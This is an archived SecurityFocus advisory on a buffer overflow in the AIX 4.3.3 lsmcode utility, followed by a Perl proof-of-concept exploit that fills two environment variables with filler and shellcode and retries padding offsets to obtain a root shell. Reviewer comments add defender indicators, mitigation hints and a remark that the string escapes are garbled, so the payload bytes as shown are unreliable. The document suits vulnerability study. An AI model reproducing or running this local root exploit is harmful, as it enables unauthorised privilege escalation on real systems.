source: http://www.securityfocus.com/bid/7871/info
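Insufficient bounds checking in the lsmcode utility allows local attackers to corrupt memory with attacker-supplied data. As a result, this condition can be exploited to execute arbitrary attacker-supplied instructions with elevated privileges. The proof-of-concept below delivers its data through the process environment (the CCC and DIAGNOSTICS variables); restricting execution of the utility to trusted administrators limits exposure on unpatched hosts.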
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested : on AIX 4.3.3. May also work on other versions.
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-6-1
# Announce: use at your own risk!
# Top-level driver: runs the lsmcode binary with two oversized environment
# variables and retries with shifted padding until a run exits with status 0.
# NOTE(review): the string escapes in this copy look garbled (the banner below
# starts with "nn"), so the values shown are not necessarily the bytes the
# author intended.
# Defender view: what is observable on a host is up to 17 executions of
# "/usr/sbin/lsmcode -d a" in quick succession by one local user, each with an
# environment that holds only CCC and DIAGNOSTICS, both unusually long (over a
# kilobyte each). Process-execution auditing that records environment size or
# contents is the natural place to catch this.
# Presumably lsmcode is installed setuid root (the header promises a uid=0
# shell) -- confirm on the host, and patch or drop the setuid bit where the
# tool is not needed.
$CMD="/usr/sbin/lsmcode";
# Output of oslevel is captured into $_ but never read again in this listing.
$_=`/usr/bin/oslevel`;
# Two short values handed to getshell(), which splices them into the payload.
$XID="x03";
$UID="x97";
print "nnExploit $CMD for Aix 4.3.3 to get uid=0 shell.n";
print "From: [ www.xfocus.org 2003-6-1 ].nn";
# A 4-unit pattern repeated 800 times, used as filler in front of the payload.
$NOP="x7cxa5x2ax79"x800;
# Wipe the inherited environment so the child sees only the two variables set
# below; this makes the child's memory layout independent of the user's shell.
%ENV=();
# CCC = one pad character + filler + payload returned by getshell().
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
# DIAGNOSTICS = a second 4-unit pattern repeated 300 times.
# presumably this is the variable whose length lsmcode fails to bound -- the
# advisory text does not name it; confirm against the vendor bulletin.
$ENV{DIAGNOSTICS}="x2fxf2x2ax2f"x300;
# List-form system(): the binary is executed directly, no shell is involved.
# $ret is the wait status; 0 means the child exited cleanly.
$ret = system $CMD ,"-d","a";
# Retry grid: while the previous run returned non-zero, try every combination
# of 0..3 pad characters in front of each variable (at most 16 more runs).
# "x" binds tighter than ".", so "A"x $i is evaluated before concatenation.
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="A"x $j ."x2fxf2x2ax2f"x300;
$ret = system $CMD ,"-d","a";
}
}
#sub
# getshell(first, second): builds and returns the payload string.
# Concatenates seven fixed chunks; the two arguments are interpolated into the
# fourth chunk, and the last chunk ends with the path /bin/sh.
# Presumably the chunks are machine code for the AIX target -- this cannot be
# verified from this listing, whose escapes look garbled.
# NOTE(review): the parenthesised list after the sub name is parsed by Perl as
# a prototype, not as named parameters; the callers use &getshell(...), which
# bypasses prototypes in any case.
sub getshell($XID,$GID) {
# NOTE(review): "my" applies only to $SHELL here. ($XID,$GID)=@_ assigns the
# package globals (the script runs without "use strict"), so the second
# argument -- passed by the callers as $UID -- lands in a global named $GID.
my $SHELL,($XID,$GID)=@_;
$SHELL="x7ex94xa2x79x7ex84xa3x78x40x82xffxfd";
$SHELL.="x7exa8x02xa6x3axb5x01x40x88x55xfexe0";
$SHELL.="x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
# The only chunk that depends on the arguments.
$SHELL.="x4cxc6x33x42x44xffxffx02$GID$XIDxffxff";
$SHELL.="x38x75xffx04x38x95xffx0cx7ex85xa3x78";
$SHELL.="x90x75xffx0cx92x95xffx10x88x55xfexe1";
# Ends with the program the payload is meant to start.
$SHELL.="x9ax95xffx0bx4bxffxffxd8/bin/shxff";
return $SHELL;
}
#EOF